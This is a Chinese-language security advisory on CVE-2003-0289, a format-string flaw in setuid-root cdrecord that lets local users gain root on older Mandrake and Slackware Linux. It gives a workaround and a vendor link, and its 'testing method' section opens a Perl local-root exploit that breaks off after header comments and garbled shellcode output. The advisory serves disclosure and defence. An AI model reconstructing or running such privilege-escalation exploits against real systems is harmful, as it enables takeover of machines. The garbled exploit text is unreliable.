发布日期：2003-05-13
更新日期：2003-05-16

受影响系统：

Cdrecord Cdrecord
    - Mandrake Linux 9.1
    - Mandrake Linux 9.0
    - Mandrake Linux 8.2
    - Slackware Linux 8.1

描述：

---

CVE(CAN) ID: CVE-2003-0289

cdrecord是一款CD刻录程序，使用在多种Linux系统中。

cdrecord对用户提供的参数缺少充分检查，本地攻击者可以利用这个漏洞进行格式串攻击，可能以root用户权限在系统上执行任意指令。

cdrecord在mandrake系统上默认以setuid root属性安装，攻击者构建恶意格式字符串作为参数提交给cdrecord，可导致破坏cdrecord进程内存结构，精心构建参数可能以root用户权限在系统上执行任意指令。

<*来源：yjm01 （yjm01@terra.com.br）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105286031812533&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

yjm01 （yjm01@terra.com.br）提供了如下测试方法：

#!/usr/bin/perl
###########################################################
#Priv8security.com Cdrecord version 2.0 and < local root exploit.
#
#     Version 1.10 is NOT VULN!!!!
#
#   [wsxz@localhost buffer]$ perl priv8cdr.pl 4
#   Using target number 4
#   Using Mr .dtors 0x808c82c
#   Cdrecord 2.0 (i586-mandrake-linux-gnu) Copyright (C) 1995-2002
J鰎g Schilling
#   scsidev: '1?郯?圬?碗^1繤F
#                               ?#                                骎
#                                
?圬@丸?

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* chmod -s /usr/bin/cdrecord

厂商补丁：

Cdrecord
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html

浏览次数：3009
严重程度：0（网友投票）